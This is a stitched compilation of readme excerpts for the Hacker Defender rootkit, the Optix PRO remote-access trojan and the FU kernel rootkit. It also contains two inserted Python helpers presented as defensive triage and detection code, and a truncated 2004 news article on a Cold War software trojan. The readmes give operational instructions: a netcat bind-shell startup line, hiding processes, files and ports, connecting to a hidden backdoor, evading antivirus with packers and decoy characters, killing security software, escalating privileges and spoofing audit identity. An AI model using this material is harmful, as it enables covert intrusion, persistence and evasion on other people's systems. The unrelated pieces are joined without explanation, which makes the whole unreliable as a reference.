%windir% - stands for Windows directory (e.g. C:\winnt\)
%tmpdir% - stands for temporary directory (e.g. C:\winnt\temp\)
Example:
1) [Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
netcat-shell is run after rootkit startup and listens on port 100
2) [Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
this will put a time stamp to temporary_directory\starttime.txt
(e.g. C:\winnt\temp\starttime.txt) every time rootkit starts
(%TIME% works only with Windows 2000 and higher)
Free Space is a list of hard drives and the number of bytes you want to add to the free space. The list item format is X:NUM where X
stands for the drive letter and NUM is the number of bytes that will be added to its number of free bytes.
Example:
[Free Space]
C:123456789
this will add about 123 MB more to the shown free disk space of disk C
Hidden Ports is a list of open ports that you want to hide from applications like OpPorts, FPort, Active Ports, Tcp View etc. It has at
most 2 lines. The first line format is TCP:tcpport1,tcpport2,tcpport3 ..., the second line format is UDP:udpport1,udpport2,udpport3 ...
Example:
1) [Hidden Ports]
TCP:8080,456
this will hide two ports: 8080/TCP and 456/TCP
2) [Hidden Ports]
TCP:8001
UDP:12345
this will hide two ports: 8001/TCP and 12345/UDP
3) [Hidden Ports]
TCP:
UDP:53,54,55,56,800
this will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP
Settings contains eight values: Password, BackdoorShell, FileMappingName, ServiceName, ServiceDisplayName,
ServiceDescription, DriverName and DriverFileName.
Password is a 16 character string used when working with the backdoor or redirector. The password can be shorter; the rest is filled with
spaces.
BackdoorShell is name for file copy of the system shell which is created by backdoor in temporary directory.
FileMappingName is the name of shared memory where the settings for hooked processes are stored.
ServiceName is the name of rootkit service.
ServiceDisplayName is display name for rootkit service.
ServiceDescription is description for rootkit service.
DriverName is the name for hxdef driver.
DriverFileName is the name for hxdef driver file.
Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdefá$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender084
ServiceDisplayName=HXD Service 084
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv084
DriverFileName=hxdefdrv.sys
This means your backdoor password is "hxdef-rulez", the backdoor will copy the system shell file (usually cmd.exe) to "hxdefá$.exe" in temp.
The name of the shared memory will be "_.-=[Hacker Defender]=-._". The name of the service is "HackerDefender084", its display name is "HXD
Service 084", its description is "powerful NT rootkit". The name of the driver is "HackerDefenderDrv084". The driver will be stored in a file called
"hxdefdrv.sys".
Extra characters |, <, >, :, \, / and " are ignored on all lines except [Startup Run], [Free Space] and [Hidden Ports] items and values in
[Settings] after first = character. Using extra characters you can make your inifile immune from antivirus systems.
Example:
[H<<<idden T>>a/"ble]
>h"xdef"*
is the same as
[Hidden Table]
hxdef*
see hxdef084.ini and hxdef084.2.ini for more examples
All strings in inifile except those in Settings and Startup Run are case insensitive.
The rootkit hooks some API functions connected with receiving packets from the net. If the incoming data equals a 256-bit-long key, the
password and service are verified, a copy of a shell is created in temp, its instance is created and the next incoming data are
redirected to this shell.
Because the rootkit hooks all processes in the system, all TCP ports on all servers will be backdoors. For example, if the target has port
80/TCP open for HTTP, then this port will also be available as a backdoor. The exception here is ports opened by the System process,
which is not hooked. This backdoor will work only on servers where the incoming buffer is larger than or equal to 256 bits. But this feature is on
almost all standard servers like Apache, IIS, Oracle.
The backdoor is hidden because its packets go through common servers on the system. So, you are not able to find it with a classic port
scanner and this backdoor can easily go through a firewall. The exception to this is classic proxies which are protocol oriented, e.g. for FTP
or HTTP. During tests on IIS services it was found that the HTTP server does not log any of these connections; FTP and SMTP servers log
only the disconnection at the end. So, if you run hxdef on a server with IIS web server, the HTTP port is probably the best port for a backdoor
connection on this machine.
You have to use a special client if you want to connect to the backdoor.
Program bdcli084.exe is used for this.
Usage: bdcli084.exe host port password
Example:
>bdcli084.exe www.windowsserver.com 80 hxdef-rulez
this will connect to the backdoor if you rooted www.windowsserver.com before and left default hxdef password
Client for version 0.8.4 is not compatible with servers in older version.
Redirector is based on backdoor technology. The first connection packets are the same as in a backdoor connection. That means you use the same
ports as for the backdoor. The next packets are special packets for the redirector only. These packets are made by the redirectors base which is run
on the user's computer. The first packet of a redirected connection defines the target server and port.
The redirectors base saves its settings into its inifile, whose name depends on the base exefile name (so the default is rdrbs084.ini). If this file
doesn't exist when the base is run, it is created automatically. It is better not to modify this inifile externally. All settings can be changed
from the base console.
If we want to use the redirector on a server where the rootkit is installed, we have to run the redirectors base on localhost before. Then in the base
console we have to create a mapped port routed to the server with hxdef. Finally we can connect to the localhost base on the chosen port and
transfer data. Redirected data are coded with the rootkit password. In this version connection speed is limited to about 256 kBps. The redirector
is not intended for high-speed connections in this version. The redirector is also limited by the system where the rootkit runs. The redirector works
with the TCP protocol only. In this version the base is controlled with 19 commands. These are not case sensitive. Their function is described in
the HELP command. During the base startup the commands in the startup-list are executed. Startup-list commands are edited with commands which
start with SU.
The redirector differentiates between two connection types (HTTP and other). If the connection is of the other type, packets are not changed. If it is
HTTP type, the Host parameter in the HTTP header is changed to the target server. The maximum redirector count on one base is 1000. The redirector
base fully works only on NT boxes. Only on NT does the program have a tray icon and you can hide the console with the HIDE command. Only on NT
can the base be run in silent mode where it has no output, no icon and it does only the commands in the startup-list.
Examples:
1) getting mapped port info
>MPINFO
No mapped ports in the list.
2) add command MPINFO to startup-list and get startup-list commands:
>SUADD MPINFO
>sulist
0) MPINFO
3) using of HELP command:
>HELP
Type HELP COMMAND for command details.
Valid commands are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL,
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
>HELP ADD
Create mapped port. You have to specify domain when using HTTP type.
usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET
SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
>HELP EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT [DIS]
4) add mapped port: we want to listen on localhost on port 100, the rootkit is installed on server 200.100.2.36 on port 80, the target server is
www.google.com on port 80, the rootkit's password is bIgpWd, the connection type is HTTP, and the ip address of the target server (www.google.com), which we always have to know, is 216.239.53.100:
>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com
command ADD can be run without parameters, in this case we are asked for every parameter separately
5) now we can check mapped ports again with MPINFO:
>MPINFO
There are 1 mapped ports in the list. Currently 0 of them open.
6) enumeration of mapped port list:
>LIST
000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP
7) detailed description of one mapped port:
>DETAIL 0
Listening on port: 100
Mapping server address: 200.100.2.36
Mapping server port: 80
Target server address: 216.239.53.100
Target server port: 80
Password: bIgpWd
Port type: HTTP
Domain name for HTTP Host: www.google.com
Current state: CLOSED
8) we can test whether the rootkit is installed with our password on mapping
server 200.100.2.36 (but this is not needed if we are sure about it):
>TEST 0
Testing 0) 200.100.2.36:80:bIgpWd - OK
if test failed it returns
Testing 0) 200.100.2.36:80:bIgpWd - FAILED
9) the port is still closed and before we can use it we have to open it with the OPEN command; we can close the port with the CLOSE command
when it is open; we can use the flag ALL when we want to apply these commands to all ports in the list; the current state
after the required action is written after a while:
>OPEN 0
Port number 0 opened.
>CLOSE 0
Port number 0 closed.
Or
>OPEN ALL
Port number 0 opened.
10) to save current settings and lists we can use SAVE command, this saves all to inifile (saving is also done by command EXIT
without DIS flag):
>SAVE
Saved successfully.
An open port is all we need for data transfer. Now you can open your favorite explorer and type http://localhost:100/ as the url. If there are no
problems you will see the main page of www.google.com load.
First packets of connection can be delayed up to 5 seconds, but others are limited only by speed of server, your internet connection
speed and by redirector technology which is about 256 kBps in this version.
=====[ 6.2 Hooked API ]=====
List of API functions which are hooked:
Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (class 5 and 16)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtQueryVolumeInformationFile
Ntdll.NtDeviceIoControlFile
Ntdll.NtLdrLoadDll
Ntdll.NtOpenProcess
Ntdll.NtCreateFile
Ntdll.NtOpenFile
Ntdll.NtLdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA
Because of many simple questions on the board I decided to create a FAQ section in this readme. Before you ask about anything read
this readme twice and pay special attention to this section. Then read old messages on the board and after that, if you still think you are
not able to find an answer for your question, you can put it on the board.
1)
Q: I've downloaded hxdef, run it and can't get rid of it. How can I uninstall it if I can't see its process, service and files?
A: If you left default settings you can run shell and stop the service:
>net stop HackerDefender084
Hxdef is implemented to uninstall completely if you stop its service. This does the same as -:uninstall but you don't need to know
where hxdef is. If you changed ServiceName in inifile Settings, type this in your shell:
>net stop ServiceName
where ServiceName stands for the value you set to ServiceName in inifile. If you forgot the name of the service you can boot your
system from CD and try to find hxdef inifile and look there for ServiceName value and then stop it as above.
2)
Q: Somebody hacked my box, ran hxdef and I can't get rid of it. How can I uninstall it and all the backdoors that were installed on
my machine?
A: The only 100% solution is to reinstall your Windows. But if you want to do this you'll have to find the inifile like in question 1) above.
Then after uninstalling hxdef from your system go through inifile and try to find all files that match files in Hidden Table. Then you
should verify those files and delete them.
3)
Q: Is this program detected by antivirus software? And if yes, is there any way
to beat it?
A: Yes, and not only the exefile is detected; a few antivirus systems also
detect the inifile and the driver file may also be detected. The answer for the second question here is yes, you can beat it quite easily. On hxdef
home site you can find a tool called Morphine. If you use Morphine on hxdef exefile you will get a new exefile which can't be detected
with common antivirus systems. Inifile is also designed to beat antivirus systems. You can add extra characters to it to confuse
antivirus systems. See 4. Inifile section for more info. Also see included inifiles. There are two samples that are equal, but the first one
is using extra characters so it can't be detected by common antivirus systems. Probably the best way is to use UPX before you use
Morphine. UPX will reduce the size of hxdef exefile and Morphine will make the anti-antivirus shield. See Morphine readme for more
info about it.
4)
Q: How is it that I can't connect to the backdoor on ports 135/TCP, 137/TCP, 138/TCP, 139/TCP or 445/TCP when the target box has them
open?
A: As mentioned in the 5. Backdoor section of this readme, the backdoor needs a server with an incoming buffer larger than or equal to 256 bits. And also
system ports may not work. If you have a problem finding an open port that works you can simply run netcat and listen on your own
port. You should then add this netcat port to Hidden Ports in the inifile.
5)
Q: Is there any way to have a hidden process whose file on disk is visible?
A: No. And you also can't have a hidden file on disk for a process which is visible in the task list.
6)
Q: How about hiding svchost.exe and others I can see in tasklist?
A: This is really bad idea. If you hide common system processes your Windows can crash very soon. With hxdef you don't need to
name your malicious files like svchost.exe, lsass.exe etc. you can name it with any name and add this name to Hidden Table to hide
them.
7)
Q: I'm using DameWare and I can see all your services and all that should be hidden. Is this a bug?
A: Nope. DameWare and others who use remote sessions (and/or netbios) can see hidden services because this feature is not
implemented yet. There's a big difference between a bug and not implemented. See the todo list on the web for things that are not
implemented yet.
8)
Q: But anyone can see my hidden files via netbios. What should I do?
A: Put your files deeply into the system directories or to directories that are not shared.
9)
Q: Backdoor client is not working. Everything seems ok, but after connecting I can't type anything and the whole console screen is
black. What should I do?
A: You probably use bad port for connecting. Hxdef tries to detect bad ports and disconnect you, but sometimes it is not able to detect
you are using bad port. So, try to use different port.
10)
Q: When will we get the new version?
A: Developers code this stuff in their free time. They take no money for this and they don't want to get money for this. There are
only two coders right now and we think this is enough for this project. This means coding is not as fast as microsoft and you should
wait and not ask when the new version will be released. Unlike microsoft our product is free and we have good beta testers and we
test this proggie a lot, so our public versions are stable.
11)
Q: net.exe command can stop hidden services, is this the bug?
A: Nope. It is not a bug, it is a feature. You still have to know the name of the service you want to stop and if it is hidden the only
one who can know it is the rootkit admin. Don't be scared that this is the way to detect you.
12)
Q: Is there any way to detect this rootkit?
A: Yes. There are so many ways to detect any rootkit and this one is not (and can't be) an exception. Every rootkit can be detected.
The only questions here are how difficult is it and did somebody make a proggie that can do it?
13)
Q: So, how difficult is it to detect hxdef? And did somebody make a proggie that can do it?
A: It is very very easy to detect this, but I don't know a special tool that can tell you that there is hxdef on your machine right now.
14)
Q: So, how can I detect it?
A: I won't tell you this :)
15)
Q: Does the version number which starts with 0 mean that it is not stable version?
A: No, it means that there are few things that are not implemented yet and that the source is closed and under development.
16)
Q: When will you publish the source? I've read it will be with the version 1.0.0, but when?
A: I really don't know when. There are several things I want to implement before releasing 1.0.0. It can take six months as well as a
year or longer.
17)
Q: I want to be the beta tester, what should I do?
A: You should write me a mail about how you can contribute, what your abilities for this job are and your experience with beta
testing. But the chance to be a new beta tester for this project is quite low. Right now we have enough testers who do a good job. No
need to increase the number of them.
18)
Q: Is it legal to use hxdef?
A: Sure it is, but hxdef can be easily misused for illegal activities.
19)
Q: Is it possible to update machine with old hxdef with this version? Is it possible without rebooting the machine?
A: It isn't possible without rebooting the machine, but you can update it when you do a manual uninstall of that old version, reboot the
machine and install the new version.
20)
Q: Is it possible to update machine with this version of hxdef with a newer version I get in future? Is it possible without rebooting?
A: Yes! You can use -:uninstall to totally remove this version of hxdef without rebooting. Then simply install the new version.
21)
Q: Is it better to use -:uninstall or to use net stop ServiceName?
A: The preferred way is to use -:uninstall if you have the chance. But net stop will also do the stuff.
22)
Q: I really love this proggie. Can I support your work with a little donation?
A: We don't need it, but we will be glad if you give your money to any of the beneficent organizations in your country and write us a mail
about it.
23)
Q: Is there any chance to hide C:\temp and not to hide C:\winnt\temp?
A: No. Create your own directory with a specific name and put it to the Hidden Table.
24)
Q: I can see the password in inifile is plaintext! How is this possible?
A: You might think this is quite an insecure way to store a password, but if you hide your inifile nobody can read it. So, it is secure. And it is
easy to change anytime and you can use -:refresh to change the password easily.
25)
Q: If I have a process that is in Hidden Table and it listens on a port, will this port be automatically hidden or should I put it to Hidden
Ports?
A: The only hidden ports are those in the Hidden Ports list. So, yes, you should put it into Hidden Ports.
An original archive of Hacker defender v0.8.4 contains these files:
hxdef084.exe     70 144 b   - program Hacker defender v0.8.4
hxdef084.ini      3 872 b   - inifile with default settings
hxdef084.2.ini    3 695 b   - inifile with default settings, variant 2
bdcli084.exe     26 624 b   - backdoor client
rdrbs084.exe     49 152 b   - redirectors base
readmecz.txt     34 864 b   - Czech version of readme file
readmeen.txt     35 375 b   - this readme file
readmefr.txt     38 296 b   - French version of readme file
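The readme above spells out how hxdef parses its inifile (decoy characters, the trailing-asterisk wildcard, which sections are case sensitive), and FAQ answers 1 and 2 describe the cleanup: boot from CD, find the inifile, read ServiceName and match files against the Hidden Table. The following offline triage helper is an added example for this reference section, not code from the hxdef readme or from LoudWolf; the sample inifile it embeds is constructed from the readme's own examples, and the candidate file names are constructed too.

```python
"""Offline triage of a recovered Hacker defender (hxdef 0.8.4) inifile.

Added example, not part of the hxdef readme.  Rules taken from the readme:
the characters in EXTRA_CHARS are ignored on every line except [Startup Run],
[Free Space] and [Hidden Ports] items and the part of a [Settings] value after
the first '='; '*' is a trailing wildcard (text after the first '*' is ignored);
surrounding spaces are ignored; only [Settings] and [Startup Run] are case sensitive.
"""

EXTRA_CHARS = '|<>:\\/"'
KNOWN_SECTIONS = ["Hidden Table", "Root Processes", "Hidden Services",
                  "Hidden RegKeys", "Hidden RegValues", "Startup Run",
                  "Free Space", "Hidden Ports", "Settings"]
CANONICAL = {name.lower(): name for name in KNOWN_SECTIONS}
RAW_SECTIONS = {"Startup Run", "Free Space", "Hidden Ports"}   # extra chars kept
CASE_SENSITIVE_SECTIONS = {"Settings", "Startup Run"}

# Constructed sample assembled from the readme's own examples, including the
# decoy-character spelling of [Hidden Table] that the readme shows.
SAMPLE_INIFILE = r'''
[H<<<idden T>>a/"ble]
>h"xdef"*
rdr|bs084*
[Hidden Services]
HackerDefender084
[Hidden RegValues]
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
[Free Space]
C:123456789
[Hidden Ports]
TCP:8080,456
UDP:53,54,55,56,800
[Settings]
Password=hxdef-rulez
ServiceName=HackerDefender084
DriverFileName=hxdefdrv.sys
'''


def strip_extra(text):
    """Drop the decoy characters hxdef ignores, e.g. '>h"xdef"*' -> 'hxdef*'."""
    return "".join(ch for ch in text if ch not in EXTRA_CHARS)


def parse_inifile(text):
    """Return {section: [entries]} using the same rules hxdef applies."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        header = strip_extra(line).strip()
        if header.startswith("[") and header.endswith("]"):
            name = header[1:-1].strip()
            current = CANONICAL.get(name.lower(), name)   # headers are case insensitive
            sections.setdefault(current, [])
            continue
        if current is None:
            continue
        if current in RAW_SECTIONS:
            entry = line                                  # items taken verbatim
        elif current == "Settings":
            key, sep, value = line.partition("=")
            entry = strip_extra(key).strip() + sep + value.strip()   # only the key is cleaned
        else:
            entry = strip_extra(line).strip()
        if entry:
            sections[current].append(entry)
    return sections


def pattern_matches(pattern, name, case_sensitive=False):
    """hxdef wildcard: only a trailing '*', and anything after the first '*' is ignored."""
    prefix, star, _ignored = pattern.partition("*")
    if not case_sensitive:
        prefix, name = prefix.lower(), name.lower()
    return name.startswith(prefix) if star else name == prefix


def hidden_matches(sections, section, candidates):
    """Which of the candidate names (files, processes, services) the inifile would hide."""
    patterns = sections.get(section, [])
    sensitive = section in CASE_SENSITIVE_SECTIONS
    return sorted(c for c in candidates
                  if any(pattern_matches(p, c, sensitive) for p in patterns))


def hidden_ports(sections):
    """[Hidden Ports] as {'TCP': [...], 'UDP': [...]}; an empty 'TCP:' line is allowed."""
    result = {"TCP": [], "UDP": []}
    for entry in sections.get("Hidden Ports", []):
        proto, _, ports = entry.partition(":")
        if proto.strip().upper() in result:
            result[proto.strip().upper()] = [int(p) for p in ports.split(",") if p.strip().isdigit()]
    return result


def settings(sections):
    """[Settings] as a dict; ServiceName is the name 'net stop' needs (FAQ answers 1 and 2)."""
    return dict(e.partition("=")[::2] for e in sections.get("Settings", []))


if __name__ == "__main__":
    s = parse_inifile(SAMPLE_INIFILE)
    found = ["HXDEF084.INI", "hxdef084.exe", "rdrbs084.exe", "notepad.exe"]   # constructed
    print("service to stop:", settings(s).get("ServiceName"))
    print("files the Hidden Table covers:", hidden_matches(s, "Hidden Table", found))
    print("masked ports:", hidden_ports(s))
```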
Optix PRO
Disclaimer:
The Creator(s) of Optix PRO or ANY Programs by EES members take NO responsibility for the way you use any of their programs.
The files and anything else in this release are for private purposes only and SHOULD ONLY BE USED BY YOURSELF ON YOUR
OWN COMPUTER! If you do not agree to these terms, delete this software NOW!
Optix PRO v1.32
1.INTRO
Well, this is it, the next release of Optix PRO. It isn't that hard to use. Layout:
.\Client\Client.exe = Client
.\Builder\Builder.exe = Builder = Program used to build server files!
WARNING: DO NOT RUN THE FILE(s) THAT YOU CREATE WITH BUILDER.EXE – THESE FILES ARE THE ONES INTENDED TO
RUN ON THE REMOTE COMPUTER THAT YOU WANT TO REMOTELY ADMINISTRATE, NOT YOUR OWN!!!!
Quick Start Tutorial:
1) Open Builder
2) Click "Build/Create Server:" button
3) Save Server as "server.exe"
4) Click UPX Packing
5) Click OK
6) Run Server.exe on the computer you wish to administrate
7) Open Client
8) Type in IP Address of other computer
9) Hit the Green Button in top-right hand corner to connect!
To find out exactly how to use a particular part of the program, simply hover your mouse button over the face of a button, control etc.
and a "help hint" will appear instructing you as to the purpose of that particular field/button etc.
UPX Packing is automated in the server build process if you wish to pack your file! To get an up-to-date copy of BlackFire's cgi logger
(cgi notification) go to:
http://www.bfndevelopment.com/
However a new logger (alternativecgilogger.zip) is also provided in this version. Advanced users check it out!
thanx to Rodger.girardin
2.FEATURE LIST
v1.32 - Client Side
COMPATIBLE WITH ALL PAST SERVER VERSIONS! in a limited way! (own risk)
Client SOCKS 4/5 Support
Power Options - logoff,suspend,reboot,shutdown etc.
Server Information - Get info about builder settings
File Manager
Process Manager
Windows Manager
Registry Manager
FTP Manager
SOCKS 4/5 Server
Remote IP Scanner
Port Redirect
Application Redirect
Message Box
Matrix Chat (Client-2-vic)
Client-2-Client chat
Computer Information
Get Passwords - (RAS/Cached - 9x and AIM)
Online Key Logger - (now window titles)
Screen Capture with left click mouse manipulation
Keyboard Manipulation - (more advanced)
Cam Capture
SendKeys - old version of SendKeys for older servers
Humor normals - Flash keyboard lights, Monitor on/off, Disable keyboard/mouse etc.
Humor Screen Printer - print text to their screen!
v1.32 - Server Side
COMPATIBLE WITH ALL PREVIOUS CLIENT VERSIONS! in a limited way! (own risk)
Configurable:
Notification Information Separators
IP Address Separator
Info included in any Notification
Identification Name
Server Port
Server Password
Fake Error
Server Icon
Registry Run startup
Registry RunServices startup
win.ini startup
system.ini startup
s7 special method startup!
Server File Name
Start Directory (windir/sysdir)
Melt Server
Unlimited ICQ Number Notification
Unlimited CGI Script Notification
Unlimited MSN Account Notification
Unlimited IRC Server/channel Notification
Unlimited PHP Script Notification
Unlimited SMTP Notification
Toggling killing of in-built exe/service list for firewalls
Toggling killing of in-built exe/service list for Anti-Virus
Toggling killing of in-built exe/service list for packages classified as both anti-virus and firewall!
Unlimited Number of custom exe's to kill
Unlimited Number of custom services to kill
***ENHANCED TECHNOLOGY OPTIONS*** - File Name and Registry Value CLOAKING!
Easily Automated UPX Packing if needed.
Option for unpacked or packed server with your own packer if wanted (instructions clear)
Fu RootKit
Program: fu.exe and msdirectx.sys
Written by: fuzen_op
Description:
fu.exe and msdirectx.sys work as one. fu.exe passes down parameters as IOCTL's to the msdirectx.sys driver. As such, once the
driver is loaded, you do not need any special privilege to run fu.exe. msdirectx.sys is the driver and does all the work of fu.exe. The
driver is never unloaded until reboot. You can use whatever methods you like to load the driver such as SystemLoadAndCallImage
suggested by Greg Hoglund.
The driver is named msdirectx.sys. It is a play on Microsoft's DirectX and is named this to help hide it. (A future tool will hide it
completely!)
The FU rootkit can now hide any named driver in a manner similar to the way it hides processes. All the code to do this is in the user
land program (fu.exe) and the corresponding driver (msdirectx.sys). This functionality is not exposed to the regular user when showing
the Usage of FU. You must read the fu.exe code yourself to determine the parameters to pass to hide drivers. The reason for this is
that it uses a hard coded address that has only been tested on two machines. Look for MyPsLoadedModuleList in the fu.exe code.
Change it as necessary. If you want to send IOCTL's to a driver, you need a handle to it. FU makes no effort to hide or delete the
symbolic link used to open a handle to the driver to be hidden. You could add this code easily though if you wanted. The
msdirectx.sys driver should just delete the symbolic link while it is hiding the driver.
The driver has many uses. It can change the groups on any process. So, you could give your process System by typing:
fu -pss #process_pid System
It can also hide a process. Type: fu -ph #process_pid
At times you may want to "adjust" the privileges on a particular process. Type: fu -prs #process_pid SeDebugPrivilege
You will need to type the specific privileges you want, but no worries I have listed them in ListPrivileges.txt.
Another feature is msdirectx.sys can change the AUTH_ID on any process. This can be used to impersonate another logon session
so that Windows Auditing etc. does not know what user really performed the actions you choose to take with the process.
Type:
fu -pas #process_pid
The process specified now looks like System in the Event Viewer, etc. You can recompile it to use Anonymous_Logon, LocalService,
or NetworkService instead of System. See Rootkit.h.
The driver does all this by Direct Kernel Object Manipulation (TM)!! No worries about whether I have permission to that process, token, etc.
If you can load a driver once, you are golden! Also, it does not use "hooking" techniques. Hooking is easily detectable. FU is much
better. It just writes directly to memory because it understands the structures inside and out.
Program Usage:
fu
[-pl] #number to list the first #number of processes
[-ph] #PID to hide the process with #PID
[-pas] #PID to set the AUTH_ID to SYSTEM on process #PID.
Use this to impersonate other people when you do things. Note: You can recompile it to use Anonymous_Logon, LocalService, or
NetworkService instead of System. See Rootkit.h.
[-prl] to list the available privileges
[-prs] #PID #privilege_name to set privileges on process #PID
[-pss] #PID #account_name to add #account_name SID to process #PID token
Caveat: The binaries I have included will only run on Windows 2000/XP. See above. You will definitely have to recompile for NT
because the kernel in 2000/XP exports except_handler3 and NT does not so the driver is not compatible across all three.
See the note above if you wish to hide drivers.
WE ARE MODIFYING KERNEL STRUCTURES (OBJECTS) DIRECTLY IN MEMORY. AS SUCH, AT TIMES IT CAN CAUSE A
BLUESCREEN. I HAVE SEEN IT HAPPEN, BUT I WOULD SAY IT IS 98% TO 99% STABLE. IT ALL DEPENDS ON WHAT YOU
ARE DOING AT THE TIME.
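As an added, defender-side illustration that is not part of the FU readme quoted above, the following Python models the cross-view check that memory-forensics tools (Volatility's psxview, for instance) use to expose DKOM hiding: a process unlinked from the EPROCESS list still appears in the PID table, the scheduler's thread queues and csrss's handle table. It also checks for the token inconsistency that -pas and -pss leave behind. All process snapshots, PIDs and SIDs are constructed, and the token check assumes the tampering left the token's user SID untouched.

```python
"""Cross-view detection of DKOM-hidden processes and AUTH_ID tampering.
Added illustration, not part of the FU readme.  Every snapshot is constructed;
on a live system each view comes from an independent enumeration source
(ActiveProcessLinks walk, PspCidTable, scheduler queues, csrss handle table)."""
from dataclasses import dataclass

# Well-known logon-session LUIDs (token AUTH_IDs) and the only SIDs that
# legitimately own them; interactive logons get a random LUID instead.
SYSTEM_LUID, LOCAL_SERVICE_LUID, NETWORK_SERVICE_LUID, ANONYMOUS_LUID = 0x3E7, 0x3E5, 0x3E4, 0x3E6
EXPECTED_USER_FOR_LUID = {SYSTEM_LUID: "S-1-5-18", LOCAL_SERVICE_LUID: "S-1-5-19",
                          NETWORK_SERVICE_LUID: "S-1-5-20", ANONYMOUS_LUID: "S-1-5-7"}

@dataclass(frozen=True)
class ProcessRecord:
    pid: int
    image: str
    user_sid: str       # token user SID
    auth_id: int        # token AuthenticationId (logon session LUID)
    groups: frozenset   # SIDs in the token's group list

def cross_view_table(views):
    """psxview-style matrix {pid: {source: seen}} over every PID any source saw."""
    all_pids = set().union(*views.values())
    return {pid: {name: pid in pids for name, pids in views.items()} for pid in all_pids}

def hidden_processes(views, primary, min_corroboration=2):
    """PIDs absent from the API-visible `primary` view but present in at least
    `min_corroboration` other views: the signature of an unlinked EPROCESS.
    Corroboration keeps a process that merely exited mid-snapshot from being
    reported; only the primary view is expected to be complete."""
    others = [pids for name, pids in views.items() if name != primary]
    candidates = set().union(*others) - views[primary]
    return sorted(p for p in candidates if sum(p in v for v in others) >= min_corroboration)

def token_anomalies(records):
    """Tokens whose AUTH_ID claims a service session the user SID does not own, or
    that carry the SYSTEM SID as a mere group.  Assumes (for this illustration) the
    tampering rewrote AUTH_ID or the group list but left the user SID intact."""
    findings = []
    for r in records:
        owner = EXPECTED_USER_FOR_LUID.get(r.auth_id)
        if owner is not None and r.user_sid != owner:
            findings.append((r.pid, f"auth_id {r.auth_id:#x} belongs to {owner}, user is {r.user_sid}"))
        if "S-1-5-18" in r.groups and r.user_sid != "S-1-5-18":
            findings.append((r.pid, "SYSTEM SID present as a group on a non-SYSTEM token"))
    return findings

USER_SID = "S-1-5-21-1000-2000-3000-1001"  # constructed domain user
SAMPLE_VIEWS = {  # constructed: pid 2200 is missing only from the linked-list walk
    "active_process_links": {4, 368, 1024, 1880},
    "pspcid_table": {4, 368, 1024, 1880, 2200},
    "thread_scheduler": {4, 368, 1024, 1880, 2200},
    "csrss_handles": {368, 1024, 1880, 2200},
}
SAMPLE_RECORDS = [
    ProcessRecord(4, "System", "S-1-5-18", SYSTEM_LUID, frozenset()),
    ProcessRecord(368, "services.exe", "S-1-5-18", SYSTEM_LUID, frozenset()),
    ProcessRecord(1024, "svchost.exe", "S-1-5-19", LOCAL_SERVICE_LUID, frozenset()),
    ProcessRecord(1880, "explorer.exe", USER_SID, 0x1A2B3, frozenset({"S-1-5-32-545"})),
    # constructed: a user's cmd.exe after its AUTH_ID was set to SYSTEM and S-1-5-18 added
    ProcessRecord(2200, "cmd.exe", USER_SID, SYSTEM_LUID, frozenset({"S-1-5-32-545", "S-1-5-18"})),
]

if __name__ == "__main__":
    for pid, seen in sorted(cross_view_table(SAMPLE_VIEWS).items()):
        print(pid, "".join("X" if ok else "." for ok in seen.values()))
    print("hidden:", hidden_processes(SAMPLE_VIEWS, "active_process_links"))
    print("token anomalies:", token_anomalies(SAMPLE_RECORDS))
```

Note that pid 4 is legitimately absent from the csrss view, which is why the check demands corroboration from several views rather than trusting any single one.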
Explosive Cold War Trojan has lessons for Open Source exporters
By Andrew Orlowski in San Francisco
Posted: 16/03/2004 at 00:49 GMT
China has irked US wireless manufacturers by insisting that they conform to the PRC's encryption
technology, we reported last week. Some commentators have castigated China for protecting its own
fledgling tech industry. But that excludes the country's very understandable security concerns.
A reminder of how important these are came last week with a revelation from the Cold War era,
contained in a new book by a senior US national security official. Thomas Reed's At The Abyss
recounts how the United States exported control software that included a Trojan Horse, and used the
software to detonate the Trans-Siberian gas pipeline in 1982. The Trojan ran a test on the pipeline
that doubled the usual pressure, causing the explosion. Reed was Reagan's special assistant for
National Security Policy at the time; he had also served as Secretary of the Air Force from 1966 to
1977 and was a former nuclear physicist at the Lawrence Livermore laboratory in California. The
software subterfuge was so secret that Reed didn't know about it until he began researching the book,
20 years later.
The scheme to plant bugs in Soviet software was masterminded by Gus Weiss, who at the time was
on the National Security Council and who died last year. Soviet agents had been so keen to acquire
US technology, they didn't question its provenance.
"[CIA Director] Bill Casey and Weiss at the NSC decided to help the Russians with their shopping.
Every piece of software would have an added ingredient," said Reed to NPR's Terry Gross last week.
The software sabotage had two effects, explains Reed. The first was economic. By creating an
explosion with the power of a three kiloton nuclear weapon, the US disrupted supplies of gas and
consequential foreign currency earnings. But the project also had important psychological
advantages in the battle between the two superpowers.
"By implication, every cell of the Soviet leviathan might be infected," he writes. "They had no way
of knowing which equipment was sound, which was bogus. All was suspect, which was the intended
endgame for the entire operation."
Tools you can trust
The two great trading powers, China and the USA, are not currently engaged in a Cold War. But
does that mean that the Cold War lessons are invalid?
Closed source software vendors such as Oracle and Microsoft hardly need to be reminded of the
delicacy of the subject. A year ago the PRC signed up for Microsoft's Government Security
